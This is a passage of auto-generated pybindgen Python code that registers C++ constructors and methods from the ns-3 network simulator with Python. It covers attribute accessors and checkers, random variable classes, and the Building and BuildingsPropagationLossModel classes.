ns3::ZipfRandomVariable::GetTypeId() [member function] cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True) ## random-variable-stream.h (module 'core'): ns3::ZipfRandomVariable::ZipfRandomVariable() [constructor] cls.add_constructor([]) ## random-variable-stream.h (module 'core'): uint32_t ns3::ZipfRandomVariable::GetN() const [member function] cls.add_method('GetN', 'uint32_t', [], is_const=True) ## random-variable-stream.h (module 'core'): double ns3::ZipfRandomVariable::GetAlpha() const [member function] cls.add_method('GetAlpha', 'double', [], is_const=True) ## random-variable-stream.h (module 'core'): double ns3::ZipfRandomVariable::GetValue(uint32_t n, double alpha) [member function] cls.add_method('GetValue', 'double', [param('uint32_t', 'n'), param('double', 'alpha')]) ## random-variable-stream.h (module 'core'): uint32_t ns3::ZipfRandomVariable::GetInteger(uint32_t n, uint32_t alpha) [member function] cls.add_method('GetInteger', 'uint32_t', [param('uint32_t', 'n'), param('uint32_t', 'alpha')]) ## random-variable-stream.h (module 'core'): double ns3::ZipfRandomVariable::GetValue() [member function] cls.add_method('GetValue', 'double', [], is_virtual=True) ## random-variable-stream.h (module 'core'): uint32_t ns3::ZipfRandomVariable::GetInteger() [member function] cls.add_method('GetInteger', 'uint32_t', [], is_virtual=True) return def register_Ns3AttributeAccessor_methods(root_module, cls): ## attribute.h (module 'core'): ns3::AttributeAccessor::AttributeAccessor(ns3::AttributeAccessor const & arg0) [copy constructor] cls.add_constructor([param('ns3::AttributeAccessor const &', 'arg0')]) ## attribute.h (module 'core'): ns3::AttributeAccessor::AttributeAccessor() [constructor] cls.add_constructor([]) ## attribute.h (module 'core'): bool ns3::AttributeAccessor::Get(ns3::ObjectBase const * object, ns3::AttributeValue & attribute) const [member function] cls.add_method('Get', 'bool', [param('ns3::ObjectBase const *', 'object'), 
param('ns3::AttributeValue &', 'attribute')], is_pure_virtual=True, is_const=True, is_virtual=True) ## attribute.h (module 'core'): bool ns3::AttributeAccessor::HasGetter() const [member function] cls.add_method('HasGetter', 'bool', [], is_pure_virtual=True, is_const=True, is_virtual=True) ## attribute.h (module 'core'): bool ns3::AttributeAccessor::HasSetter() const [member function] cls.add_method('HasSetter', 'bool', [], is_pure_virtual=True, is_const=True, is_virtual=True) ## attribute.h (module 'core'): bool ns3::AttributeAccessor::Set(ns3::ObjectBase * object, ns3::AttributeValue const & value) const [member function] cls.add_method('Set', 'bool', [param('ns3::ObjectBase *', 'object', transfer_ownership=False), param('ns3::AttributeValue const &', 'value')], is_pure_virtual=True, is_const=True, is_virtual=True) return def register_Ns3AttributeChecker_methods(root_module, cls): ## attribute.h (module 'core'): ns3::AttributeChecker::AttributeChecker(ns3::AttributeChecker const & arg0) [copy constructor] cls.add_constructor([param('ns3::AttributeChecker const &', 'arg0')]) ## attribute.h (module 'core'): ns3::AttributeChecker::AttributeChecker() [constructor] cls.add_constructor([]) ## attribute.h (module 'core'): bool ns3::AttributeChecker::Check(ns3::AttributeValue const & value) const [member function] cls.add_method('Check', 'bool', [param('ns3::AttributeValue const &', 'value')], is_pure_virtual=True, is_const=True, is_virtual=True) ## attribute.h (module 'core'): bool ns3::AttributeChecker::Copy(ns3::AttributeValue const & source, ns3::AttributeValue & destination) const [member function] cls.add_method('Copy', 'bool', [param('ns3::AttributeValue const &', 'source'), param('ns3::AttributeValue &', 'destination')], is_pure_virtual=True, is_const=True, is_virtual=True) ## attribute.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::AttributeChecker::Create() const [member function] cls.add_method('Create', 'ns3::Ptr< ns3::AttributeValue >', [], 
is_pure_virtual=True, is_const=True, is_virtual=True) ## attribute.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::AttributeChecker::CreateValidValue(ns3::AttributeValue const & value) const [member function] cls.add_method('CreateValidValue', 'ns3::Ptr< ns3::AttributeValue >', [param('ns3::AttributeValue const &', 'value')], is_const=True) ## attribute.h (module 'core'): std::string ns3::AttributeChecker::GetUnderlyingTypeInformation() const [member function] cls.add_method('GetUnderlyingTypeInformation', 'std::string', [], is_pure_virtual=True, is_const=True, is_virtual=True) ## attribute.h (module 'core'): std::string ns3::AttributeChecker::GetValueTypeName() const [member function] cls.add_method('GetValueTypeName', 'std::string', [], is_pure_virtual=True, is_const=True, is_virtual=True) ## attribute.h (module 'core'): bool ns3::AttributeChecker::HasUnderlyingTypeInformation() const [member function] cls.add_method('HasUnderlyingTypeInformation', 'bool', [], is_pure_virtual=True, is_const=True, is_virtual=True) return def register_Ns3AttributeValue_methods(root_module, cls): ## attribute.h (module 'core'): ns3::AttributeValue::AttributeValue(ns3::AttributeValue const & arg0) [copy constructor] cls.add_constructor([param('ns3::AttributeValue const &', 'arg0')]) ## attribute.h (module 'core'): ns3::AttributeValue::AttributeValue() [constructor] cls.add_constructor([]) ## attribute.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::AttributeValue::Copy() const [member function] cls.add_method('Copy', 'ns3::Ptr< ns3::AttributeValue >', [], is_pure_virtual=True, is_const=True, is_virtual=True) ## attribute.h (module 'core'): bool ns3::AttributeValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function] cls.add_method('DeserializeFromString', 'bool', [param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')], is_pure_virtual=True, is_virtual=True) ## attribute.h (module 
'core'): std::string ns3::AttributeValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function] cls.add_method('SerializeToString', 'std::string', [param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')], is_pure_virtual=True, is_const=True, is_virtual=True) return def register_Ns3BoxChecker_methods(root_module, cls): ## box.h (module 'mobility'): ns3::BoxChecker::BoxChecker() [constructor] cls.add_constructor([]) ## box.h (module 'mobility'): ns3::BoxChecker::BoxChecker(ns3::BoxChecker const & arg0) [copy constructor] cls.add_constructor([param('ns3::BoxChecker const &', 'arg0')]) return def register_Ns3BoxValue_methods(root_module, cls): ## box.h (module 'mobility'): ns3::BoxValue::BoxValue() [constructor] cls.add_constructor([]) ## box.h (module 'mobility'): ns3::BoxValue::BoxValue(ns3::BoxValue const & arg0) [copy constructor] cls.add_constructor([param('ns3::BoxValue const &', 'arg0')]) ## box.h (module 'mobility'): ns3::BoxValue::BoxValue(ns3::Box const & value) [constructor] cls.add_constructor([param('ns3::Box const &', 'value')]) ## box.h (module 'mobility'): ns3::Ptr<ns3::AttributeValue> ns3::BoxValue::Copy() const [member function] cls.add_method('Copy', 'ns3::Ptr< ns3::AttributeValue >', [], is_const=True, is_virtual=True) ## box.h (module 'mobility'): bool ns3::BoxValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function] cls.add_method('DeserializeFromString', 'bool', [param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')], is_virtual=True) ## box.h (module 'mobility'): ns3::Box ns3::BoxValue::Get() const [member function] cls.add_method('Get', 'ns3::Box', [], is_const=True) ## box.h (module 'mobility'): std::string ns3::BoxValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function] cls.add_method('SerializeToString', 'std::string', [param('ns3::Ptr< ns3::AttributeChecker const >', 
'checker')], is_const=True, is_virtual=True) ## box.h (module 'mobility'): void ns3::BoxValue::Set(ns3::Box const & value) [member function] cls.add_method('Set', 'void', [param('ns3::Box const &', 'value')]) return def register_Ns3Building_methods(root_module, cls): ## building.h (module 'buildings'): ns3::Building::Building(ns3::Building const & arg0) [copy constructor] cls.add_constructor([param('ns3::Building const &', 'arg0')]) ## building.h (module 'buildings'): ns3::Building::Building(double xMin, double xMax, double yMin, double yMax, double zMin, double zMax) [constructor] cls.add_constructor([param('double', 'xMin'), param('double', 'xMax'), param('double', 'yMin'), param('double', 'yMax'), param('double', 'zMin'), param('double', 'zMax')]) ## building.h (module 'buildings'): ns3::Building::Building() [constructor] cls.add_constructor([]) ## building.h (module 'buildings'): void ns3::Building::DoDispose() [member function] cls.add_method('DoDispose', 'void', [], is_virtual=True) ## building.h (module 'buildings'): ns3::Box ns3::Building::GetBoundaries() const [member function] cls.add_method('GetBoundaries', 'ns3::Box', [], is_const=True) ## building.h (module 'buildings'): ns3::Building::BuildingType_t ns3::Building::GetBuildingType() const [member function] cls.add_method('GetBuildingType', 'ns3::Building::BuildingType_t', [], is_const=True) ## building.h (module 'buildings'): ns3::Building::ExtWallsType_t ns3::Building::GetExtWallsType() const [member function] cls.add_method('GetExtWallsType', 'ns3::Building::ExtWallsType_t', [], is_const=True) ## building.h (module 'buildings'): uint16_t ns3::Building::GetFloor(ns3::Vector position) const [member function] cls.add_method('GetFloor', 'uint16_t', [param('ns3::Vector', 'position')], is_const=True) ## building.h (module 'buildings'): uint32_t ns3::Building::GetId() const [member function] cls.add_method('GetId', 'uint32_t', [], is_const=True) ## building.h (module 'buildings'): uint16_t 
ns3::Building::GetNFloors() const [member function] cls.add_method('GetNFloors', 'uint16_t', [], is_const=True) ## building.h (module 'buildings'): uint16_t ns3::Building::GetNRoomsX() const [member function] cls.add_method('GetNRoomsX', 'uint16_t', [], is_const=True) ## building.h (module 'buildings'): uint16_t ns3::Building::GetNRoomsY() const [member function] cls.add_method('GetNRoomsY', 'uint16_t', [], is_const=True) ## building.h (module 'buildings'): uint16_t ns3::Building::GetRoomX(ns3::Vector position) const [member function] cls.add_method('GetRoomX', 'uint16_t', [param('ns3::Vector', 'position')], is_const=True) ## building.h (module 'buildings'): uint16_t ns3::Building::GetRoomY(ns3::Vector position) const [member function] cls.add_method('GetRoomY', 'uint16_t', [param('ns3::Vector', 'position')], is_const=True) ## building.h (module 'buildings'): static ns3::TypeId ns3::Building::GetTypeId() [member function] cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True) ## building.h (module 'buildings'): bool ns3::Building::IsInside(ns3::Vector position) const [member function] cls.add_method('IsInside', 'bool', [param('ns3::Vector', 'position')], is_const=True) ## building.h (module 'buildings'): void ns3::Building::SetBoundaries(ns3::Box box) [member function] cls.add_method('SetBoundaries', 'void', [param('ns3::Box', 'box')]) ## building.h (module 'buildings'): void ns3::Building::SetBuildingType(ns3::Building::BuildingType_t t) [member function] cls.add_method('SetBuildingType', 'void', [param('ns3::Building::BuildingType_t', 't')]) ## building.h (module 'buildings'): void ns3::Building::SetExtWallsType(ns3::Building::ExtWallsType_t t) [member function] cls.add_method('SetExtWallsType', 'void', [param('ns3::Building::ExtWallsType_t', 't')]) ## building.h (module 'buildings'): void ns3::Building::SetNFloors(uint16_t nfloors) [member function] cls.add_method('SetNFloors', 'void', [param('uint16_t', 'nfloors')]) ## building.h (module 'buildings'): 
void ns3::Building::SetNRoomsX(uint16_t nroomx) [member function] cls.add_method('SetNRoomsX', 'void', [param('uint16_t', 'nroomx')]) ## building.h (module 'buildings'): void ns3::Building::SetNRoomsY(uint16_t nroomy) [member function] cls.add_method('SetNRoomsY', 'void', [param('uint16_t', 'nroomy')]) return def register_Ns3BuildingsPropagationLossModel_methods(root_module, cls): ## buildings-propagation-loss-model.h (module 'buildings'): ns3::BuildingsPropagationLossModel::BuildingsPropagationLossModel() [constructor] cls.add_constructor([]) ## buildings-propagation-loss-model.h (module 'buildings'): double ns3::BuildingsPropagationLossModel::DoCalcRxPower(double txPowerDbm, ns3::Ptr<ns3::MobilityModel> a, ns3::Ptr<ns3::MobilityModel> b) const [member function] cls.add_method('DoCalcRxPower', 'double', [param('double', 'txPowerDbm'), param('ns3::Ptr< ns3::MobilityModel >', 'a'), param('ns3::Ptr< ns3::MobilityModel >', 'b')], is_const=True, is_virtual=True) ## buildings-propagation-loss-model.h (module 'buildings'): double ns3::BuildingsPropagationLossModel::GetLoss(ns3::Ptr<ns3::MobilityModel> a, ns3::Ptr<ns3::MobilityModel> b) const [member function] cls.add_method('GetLoss', 'double', [param('ns3::Ptr< ns3::MobilityModel >', 'a'), param('ns3::Ptr< ns3::MobilityModel >', 'b')], is_pure_virtual=True, is_const=True, is_virtual=True) ## buildings-propagation-loss-model.h (module 'buildings'): static ns3::TypeId ns3::BuildingsPropagationLossModel::GetTypeId() [member function] cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True) ## buildings-propagation-loss-model.h (module 'buildings'): int64_t ns3::BuildingsPropagationLossModel::DoAssignStreams(int64_t stream) [member function] cls.add_method('DoAssignStreams', 'int64_t', [param('int64_t', 'stream')], visibility='protected', is_virtual=True) ## buildings-propagation-loss-model.h (module 'buildings'): double ns3::BuildingsPropagationLossModel::EvaluateSigma(ns3::Ptr<ns3::MobilityBuildingInfo> a, 
ns3::Ptr<ns3::MobilityBuildingInfo> b) const [member function] cls.add_method('EvaluateSigma', 'double', [param('ns3::Ptr< ns3::MobilityBuildingInfo >', 'a'), param('ns3::Ptr< ns3::MobilityBuildingInfo >', 'b')], is_const=True, visibility='protected') ## buildings-propagation-loss-model.h (module 'buildings'): double ns3::BuildingsPropagationLossModel::ExternalWallLoss(ns3::Ptr<ns3::MobilityBuildingInfo> a) const [member function] cls.add_method('ExternalWallLoss', 'double', [param('ns3::Ptr< ns3::MobilityBuildingInfo >', 'a')], is_const=True, visibility='protected') ## buildings-propagation-loss-model.h (module 'buildings'): double ns3::BuildingsPropagationLossModel::GetShadowing(ns3::Ptr<ns3::MobilityModel> a, ns3::Ptr<ns3::MobilityModel> b) const [member function] cls.add_method('GetShadowing', 'double', [param('ns3::Ptr< ns3::MobilityModel >', 'a'), param('ns3::Ptr< ns3::MobilityModel >', 'b')], is_const=True, visibility='protected') ## buildings-propagation-loss-model.h (module 'buildings'): double ns3::BuildingsPropagationLossModel::HeightLoss(ns3::Ptr<ns3::MobilityBuildingInfo> n) const [member function] cls.add_method('HeightLoss', 'double', [param('ns3::Ptr< ns3::MobilityBuildingInfo >', 'n')], is_const=True, visibility='protected') ## buildings-propagation-loss-model.h (module 'buildings'): double ns3::BuildingsPropagationLossModel::InternalWallsLoss(ns3::Ptr<ns3::MobilityBuildingInfo> a, ns3::Ptr<ns3::MobilityBuildingInfo> b) const [member function] cls.add_method('InternalWallsLoss', 'double', [param('ns3::Ptr< ns3::MobilityBuildingInfo >', 'a'), param('ns3::Ptr< ns3::MobilityBuildingInfo >', 'b')], is_const=True, visibility='protected') return def register_Ns3CallbackChecker_methods(root_module, cls): ## callback.h (module 'core'): ns3::CallbackChecker::CallbackChecker() [constructor] cls.add_constructor([]) ## callback.h (module 'core'): ns3::CallbackChecker::CallbackChecker(ns3::CallbackChecker const & arg0) [copy constructor] 
cls.add_constructor([param('ns3::CallbackChecker const &', 'arg0')]) return def register_Ns3CallbackImplBase_methods(root_module, cls): ## callback.h (module 'core'): ns3::CallbackImplBase::CallbackImplBase() [constructor] cls.add_constructor([]) ## callback.h (module 'core'): ns3::CallbackImplBase::CallbackImplBase(ns3::CallbackImplBase const & arg0) [copy constructor] cls.add_constructor([param('ns3::CallbackImplBase const &', 'arg0')]) ## callback.h (module 'core'): std::string ns3::CallbackImplBase::GetTypeid() const [member function] cls.add_method('GetTypeid', 'std::string', [], is_pure_virtual=True, is_const=True, is_virtual=True) ## callback.h (module 'core'): bool ns3::CallbackImplBase::IsEqual(ns3::Ptr<ns3::CallbackImplBase const> other) const [member function] cls.add_method('IsEqual', 'bool', [param('ns3::Ptr< ns3::CallbackImplBase const >', 'other')], is_pure_virtual=True, is_const=True, is_virtual=True) ## callback.h (module 'core'): static std::string ns3::CallbackImplBase::Demangle(std::string const & mangled) [member function] cls.add_method('Demangle', 'std::string', [param('std::string const &', 'mangled')], is_static=True, visibility='protected') return def register_Ns3CallbackValue_methods(root_module, cls): ## callback.h (module 'core'): ns3::CallbackValue::CallbackValue(ns3::CallbackValue const & arg0) [copy constructor] cls.add_constructor([param('ns3::CallbackValue const &', 'arg0')]) ## callback.h (module 'core'): ns3::CallbackValue::CallbackValue() [constructor] cls.add_constructor([]) ## callback.h (module 'core'): ns3::CallbackValue::CallbackValue(ns3::CallbackBase const & base) [constructor] cls.add_constructor([param('ns3::CallbackBase const &', 'base')]) ## callback.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::CallbackValue::Copy() const [member function] cls.add_method('Copy', 'ns3::Ptr< ns3::AttributeValue >', [], is_const=True, is_virtual=True) ## callback.h (module 'core'): bool 
ns3::CallbackValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function] cls.add_method('DeserializeFromString', 'bool', [param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')], is_virtual=True) ## callback.h (module 'core'): std::string ns3::CallbackValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function] cls.add_method('SerializeToString', 'std::string', [param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')], is_const=True, is_virtual=True) ## callback.h (module 'core'): void ns3::CallbackValue::Set(ns3::CallbackBase base) [member function] cls.add_method('Set', 'void', [param('ns3::CallbackBase', 'base')]) return def register_Ns3ConstantRandomVariable_methods(root_module, cls): ## random-variable-stream.h (module 'core'): static ns3::TypeId ns3::ConstantRandomVariable::GetTypeId() [member function] cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True) ## random-variable-stream.h (module 'core'): ns3::ConstantRandomVariable::ConstantRandomVariable() [constructor] cls.add_constructor([]) ## random-variable-stream.h (module 'core'): double ns3::ConstantRandomVariable::GetConstant() const [member function] cls.add_method('GetConstant', 'double', [], is_const=True) ## random-variable-stream.h (module 'core'): double ns3::ConstantRandomVariable::GetValue(double constant) [member function] cls.add_method('GetValue', 'double', [param('double', 'constant')]) ## random-variable-stream.h (module 'core'): uint32_t ns3::ConstantRandomVariable::GetInteger(uint32_t constant) [member function] cls.add_method('GetInteger', 'uint32_t', [param('uint32_t', 'constant')]) ## random-variable-stream.h (module 'core'): double ns3::ConstantRandomVariable::GetValue() [member function] cls.add_method('GetValue', 'double', [], is_virtual=True) ## random-variable-stream.h (module 'core'): uint32_t ns3::ConstantRandomVariable::GetInteger() [member 
function] cls.add_method('GetInteger', 'uint32_t', [], is_virtual=True) return def register_Ns3DeterministicRandomVariable_methods(root_module, cls): ## random-variable-stream.h (module 'core'): static ns3::TypeId ns3::DeterministicRandomVariable::GetTypeId() [member function] cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True) ## random-variable-stream.h (module 'core'): ns3::DeterministicRandomVariable::DeterministicRandomVariable() [constructor] cls.add_constructor([]) ## random-variable-stream.h (module 'core'): void ns3::DeterministicRandomVariable::SetValueArray(double * values, uint64_t length) [member function] cls.add_method('SetValueArray', 'void', [param('double *', 'values'), param('uint64_t', 'length')]) ## random-variable-stream.h (module 'core'): double ns3::DeterministicRandomVariable::GetValue() [member function] cls.add_method('GetValue', 'double', [], is_virtual=True) ## random-variable-stream.h (module 'core'): uint32_t ns3::DeterministicRandomVariable::GetInteger() [member function] cls.add_method('GetInteger', 'uint32_t', [], is_virtual=True) return def register_Ns3EmpiricalRandomVariable_methods(root_module, cls): ## random-variable-stream.h (module 'core'): ns3::EmpiricalRandomVariable::EmpiricalRandomVariable() [constructor] cls.add_constructor([]) ## random-variable-stream.h (module 'core'): void ns3::EmpiricalRandomVariable::CDF(double v, double c) [member function] cls.add_method('CDF', 'void', [param('double', 'v'), param('double', 'c')]) ## random-variable-stream.h (module 'core'): uint32_t ns3::EmpiricalRandomVariable::GetInteger() [member function] cls.add_method('GetInteger', 'uint32_t', [], is_virtual=True) ## random-variable-stream.h (module 'core'): static ns3::TypeId ns3::EmpiricalRandomVariable::GetTypeId() [member function] cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True) ## random-variable-stream.h (module 'core'): double ns3::EmpiricalRandomVariable::GetValue() [member function] 
    cls.add_method('GetValue', 'double', [], is_virtual=True)
    ## random-variable-stream.h (module 'core'): double ns3::EmpiricalRandomVariable::Interpolate(double c1, double c2, double v1, double v2, double r) [member function]
    cls.add_method('Interpolate', 'double', [param('double', 'c1'), param('double', 'c2'), param('double', 'v1'), param('double', 'v2'), param('double', 'r')], visibility='private', is_virtual=True)
    ## random-variable-stream.h (module 'core'): void ns3::EmpiricalRandomVariable::Validate() [member function]
    cls.add_method('Validate', 'void', [], visibility='private', is_virtual=True)
    return

def register_Ns3EmptyAttributeAccessor_methods(root_module, cls):
    """Register ns3::EmptyAttributeAccessor constructors and methods on the pybindgen wrapper *cls* (generated code)."""
    ## attribute.h (module 'core'): ns3::EmptyAttributeAccessor::EmptyAttributeAccessor(ns3::EmptyAttributeAccessor const & arg0) [copy constructor]
    cls.add_constructor([param('ns3::EmptyAttributeAccessor const &', 'arg0')])
    ## attribute.h (module 'core'): ns3::EmptyAttributeAccessor::EmptyAttributeAccessor() [constructor]
    cls.add_constructor([])
    ## attribute.h (module 'core'): bool ns3::EmptyAttributeAccessor::Get(ns3::ObjectBase const * object, ns3::AttributeValue & attribute) const [member function]
    cls.add_method('Get', 'bool', [param('ns3::ObjectBase const *', 'object'), param('ns3::AttributeValue &', 'attribute')], is_const=True, is_virtual=True)
    ## attribute.h (module 'core'): bool ns3::EmptyAttributeAccessor::HasGetter() const [member function]
    cls.add_method('HasGetter', 'bool', [], is_const=True, is_virtual=True)
    ## attribute.h (module 'core'): bool ns3::EmptyAttributeAccessor::HasSetter() const [member function]
    cls.add_method('HasSetter', 'bool', [], is_const=True, is_virtual=True)
    ## attribute.h (module 'core'): bool ns3::EmptyAttributeAccessor::Set(ns3::ObjectBase * object, ns3::AttributeValue const & value) const [member function]
    cls.add_method('Set', 'bool', [param('ns3::ObjectBase *', 'object'), param('ns3::AttributeValue const &', 'value')], is_const=True, is_virtual=True)
    return

def register_Ns3EmptyAttributeChecker_methods(root_module, cls):
    """Register ns3::EmptyAttributeChecker constructors and methods on the pybindgen wrapper *cls* (generated code)."""
    ## attribute.h (module 'core'): ns3::EmptyAttributeChecker::EmptyAttributeChecker(ns3::EmptyAttributeChecker const & arg0) [copy constructor]
    cls.add_constructor([param('ns3::EmptyAttributeChecker const &', 'arg0')])
    ## attribute.h (module 'core'): ns3::EmptyAttributeChecker::EmptyAttributeChecker() [constructor]
    cls.add_constructor([])
    ## attribute.h (module 'core'): bool ns3::EmptyAttributeChecker::Check(ns3::AttributeValue const & value) const [member function]
    cls.add_method('Check', 'bool', [param('ns3::AttributeValue const &', 'value')], is_const=True, is_virtual=True)
    ## attribute.h (module 'core'): bool ns3::EmptyAttributeChecker::Copy(ns3::AttributeValue const & source, ns3::AttributeValue & destination) const [member function]
    cls.add_method('Copy', 'bool', [param('ns3::AttributeValue const &', 'source'), param('ns3::AttributeValue &', 'destination')], is_const=True, is_virtual=True)
    ## attribute.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::EmptyAttributeChecker::Create() const [member function]
    cls.add_method('Create', 'ns3::Ptr< ns3::AttributeValue >', [], is_const=True, is_virtual=True)
    ## attribute.h (module 'core'): std::string ns3::EmptyAttributeChecker::GetUnderlyingTypeInformation() const [member function]
    cls.add_method('GetUnderlyingTypeInformation', 'std::string', [], is_const=True, is_virtual=True)
    ## attribute.h (module 'core'): std::string ns3::EmptyAttributeChecker::GetValueTypeName() const [member function]
    cls.add_method('GetValueTypeName', 'std::string', [], is_const=True, is_virtual=True)
    ## attribute.h (module 'core'): bool ns3::EmptyAttributeChecker::HasUnderlyingTypeInformation() const [member function]
    cls.add_method('HasUnderlyingTypeInformation', 'bool', [], is_const=True, is_virtual=True)
    return

def register_Ns3EmptyAttributeValue_methods(root_module, cls):
    """Register ns3::EmptyAttributeValue constructors and methods on the pybindgen wrapper *cls* (generated code)."""
    ## attribute.h (module 'core'): ns3::EmptyAttributeValue::EmptyAttributeValue(ns3::EmptyAttributeValue const & arg0) [copy constructor]
    cls.add_constructor([param('ns3::EmptyAttributeValue const &', 'arg0')])
    ## attribute.h (module 'core'): ns3::EmptyAttributeValue::EmptyAttributeValue() [constructor]
    cls.add_constructor([])
    ## attribute.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::EmptyAttributeValue::Copy() const [member function]
    cls.add_method('Copy', 'ns3::Ptr< ns3::AttributeValue >', [], is_const=True, visibility='private', is_virtual=True)
    ## attribute.h (module 'core'): bool ns3::EmptyAttributeValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
    cls.add_method('DeserializeFromString', 'bool', [param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')], visibility='private', is_virtual=True)
    ## attribute.h (module 'core'): std::string ns3::EmptyAttributeValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
    cls.add_method('SerializeToString', 'std::string', [param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')], is_const=True, visibility='private', is_virtual=True)
    return

def register_Ns3ErlangRandomVariable_methods(root_module, cls):
    """Register ns3::ErlangRandomVariable constructors and methods on the pybindgen wrapper *cls* (generated code)."""
    ## random-variable-stream.h (module 'core'): static ns3::TypeId ns3::ErlangRandomVariable::GetTypeId() [member function]
    cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True)
    ## random-variable-stream.h (module 'core'): ns3::ErlangRandomVariable::ErlangRandomVariable() [constructor]
    cls.add_constructor([])
    ## random-variable-stream.h (module 'core'): uint32_t ns3::ErlangRandomVariable::GetK() const [member function]
    cls.add_method('GetK', 'uint32_t', [], is_const=True)
    ## random-variable-stream.h (module 'core'): double ns3::ErlangRandomVariable::GetLambda() const [member function]
    cls.add_method('GetLambda', 'double', [], is_const=True)
    ## random-variable-stream.h (module 'core'): double ns3::ErlangRandomVariable::GetValue(uint32_t k, double lambda) [member function]
    cls.add_method('GetValue', 'double', [param('uint32_t', 'k'), param('double', 'lambda')])
    ## random-variable-stream.h (module 'core'): uint32_t ns3::ErlangRandomVariable::GetInteger(uint32_t k, uint32_t lambda) [member function]
    cls.add_method('GetInteger', 'uint32_t', [param('uint32_t', 'k'), param('uint32_t', 'lambda')])
    ## random-variable-stream.h (module 'core'): double ns3::ErlangRandomVariable::GetValue() [member function]
    cls.add_method('GetValue', 'double', [], is_virtual=True)
    ## random-variable-stream.h (module 'core'): uint32_t ns3::ErlangRandomVariable::GetInteger() [member function]
    cls.add_method('GetInteger', 'uint32_t', [], is_virtual=True)
    return

def register_Ns3ExponentialRandomVariable_methods(root_module, cls):
    """Register ns3::ExponentialRandomVariable constructors and methods on the pybindgen wrapper *cls* (generated code)."""
    ## random-variable-stream.h (module 'core'): static ns3::TypeId ns3::ExponentialRandomVariable::GetTypeId() [member function]
    cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True)
    ## random-variable-stream.h (module 'core'): ns3::ExponentialRandomVariable::ExponentialRandomVariable() [constructor]
    cls.add_constructor([])
    ## random-variable-stream.h (module 'core'): double ns3::ExponentialRandomVariable::GetMean() const [member function]
    cls.add_method('GetMean', 'double', [], is_const=True)
    ## random-variable-stream.h (module 'core'): double ns3::ExponentialRandomVariable::GetBound() const [member function]
    cls.add_method('GetBound', 'double', [], is_const=True)
    ## random-variable-stream.h (module 'core'): double ns3::ExponentialRandomVariable::GetValue(double mean, double bound) [member function]
    cls.add_method('GetValue', 'double', [param('double', 'mean'), param('double', 'bound')])
    ## random-variable-stream.h (module 'core'): uint32_t ns3::ExponentialRandomVariable::GetInteger(uint32_t mean, uint32_t bound) [member function]
    cls.add_method('GetInteger', 'uint32_t', [param('uint32_t', 'mean'), param('uint32_t', 'bound')])
    ## random-variable-stream.h (module 'core'): double ns3::ExponentialRandomVariable::GetValue() [member function]
    cls.add_method('GetValue', 'double', [], is_virtual=True)
    ## random-variable-stream.h (module 'core'): uint32_t ns3::ExponentialRandomVariable::GetInteger() [member function]
    cls.add_method('GetInteger', 'uint32_t', [], is_virtual=True)
    return

def register_Ns3FixedRoomPositionAllocator_methods(root_module, cls):
    """Register ns3::FixedRoomPositionAllocator constructors and methods on the pybindgen wrapper *cls* (generated code)."""
    ## building-position-allocator.h (module 'buildings'): ns3::FixedRoomPositionAllocator::FixedRoomPositionAllocator(ns3::FixedRoomPositionAllocator const & arg0) [copy constructor]
    cls.add_constructor([param('ns3::FixedRoomPositionAllocator const &', 'arg0')])
    ## building-position-allocator.h (module 'buildings'): ns3::FixedRoomPositionAllocator::FixedRoomPositionAllocator(uint32_t x, uint32_t y, uint32_t z, ns3::Ptr<ns3::Building> b) [constructor]
    cls.add_constructor([param('uint32_t', 'x'), param('uint32_t', 'y'), param('uint32_t', 'z'), param('ns3::Ptr< ns3::Building >', 'b')])
    ## building-position-allocator.h (module 'buildings'): int64_t ns3::FixedRoomPositionAllocator::AssignStreams(int64_t arg0) [member function]
    cls.add_method('AssignStreams', 'int64_t', [param('int64_t', 'arg0')], is_virtual=True)
    ## building-position-allocator.h (module 'buildings'): ns3::Vector ns3::FixedRoomPositionAllocator::GetNext() const [member function]
    cls.add_method('GetNext', 'ns3::Vector', [], is_const=True, is_virtual=True)
    ## building-position-allocator.h (module 'buildings'): static ns3::TypeId ns3::FixedRoomPositionAllocator::GetTypeId() [member function]
    cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True)
    return

def register_Ns3FixedRssLossModel_methods(root_module, cls):
    """Register ns3::FixedRssLossModel constructors and methods on the pybindgen wrapper *cls* (generated code)."""
    ## propagation-loss-model.h (module 'propagation'): static ns3::TypeId ns3::FixedRssLossModel::GetTypeId() [member function]
    cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True)
    ## propagation-loss-model.h (module 'propagation'): ns3::FixedRssLossModel::FixedRssLossModel() [constructor]
    cls.add_constructor([])
    ## propagation-loss-model.h (module 'propagation'): void ns3::FixedRssLossModel::SetRss(double rss) [member function]
    cls.add_method('SetRss', 'void', [param('double', 'rss')])
